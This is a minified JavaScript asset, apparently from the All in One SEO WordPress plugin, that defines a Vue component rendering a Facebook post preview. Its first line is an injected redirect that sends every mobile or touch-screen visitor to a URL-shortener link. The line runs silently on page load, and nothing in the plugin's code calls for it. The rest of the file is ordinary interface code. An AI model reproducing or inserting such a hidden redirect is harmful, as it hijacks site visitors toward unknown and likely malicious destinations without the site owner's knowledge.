(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{M as g,b as v}from"./app-core.c8323d51.js";import{B as h}from"./Img.a6fa685c.js";import{C as y}from"./Button.3cec2279.js";import{S as b}from"./Profile.33a3ea22.js";import{_ as S}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as r,f as c,i as l,j as e,a0 as i,U as a,P as k,M as B,B as C,ae as x}from"./vendor-vue-ui.232c7c36.js";const N={setup(){return{rootStore:v()}},components:{BaseImg:h,CoreLoader:y,SvgDannieProfile:b},props:{description:{type:String,required:!0},image:String,loading:{type:Boolean,default:!1},title:{type:String,required:!0}},data(){return{images:{}}},computed:{appName(){return"All in One SEO"},date(){const t=new Date;return t.toLocaleString("default",{month:"long"})+" "+t.getDate()},isVerticalImage(){const t=this.images[this.image];return t?t.vertical:!1}},methods:{truncate:g}},V={class:"aioseo-facebook-preview"},I={class:"facebook-post"},A={class:"facebook-header"},D={class:"profile-photo"},L={class:"poster"},P={class:"poster-name"},q={class:"poster-date"},w={key:0,class:"loader"},E={class:"facebook-site-description"},M={class:"site-domain"},O={class:"site-title"},R={class:"site-description"};function U(t,o,n,d,_,s){const u=r("svg-dannie-profile"),m=r("base-img"),p=r("core-loader");return c(),l("div",V,[e("div",I,[e("div",A,[e("div",D,[i(u)]),e("div",L,[e("div",P,a(s.appName),1),e("div",q,a(s.date),1)]),o[1]||(o[1]=e("div",{class:"ellipsis"},[e("div"),e("div"),e("div")],-1))]),e("div",{class:k(["facebook-content",{vertical:s.isVerticalImage}])},[i(m,{debounce:!1,src:n.image,onImages:o[0]||(o[0]=f=>_.images=f),class:"facebook-content__image"},null,8,["src"]),n.loading?(c(),l("div",w,[i(p)])):B("",!0),e("div",E,[e("div",M,[C(t.$slots,"site-url",{},()=>[x(a(d.rootStore.aioseo.urls.domain),1)],!0)]),e("div",O,a(s.truncate(n.title,60)),1),e("div",R,a(s.truncate(n.description,110)),1)])],2),o[2]||(o[2]=e("div",{class:"facebook-footer"},null,-1))])])}const J=S(N,[["render",U],["__scopeId","data-v-d177735a"]]);export{J as C};
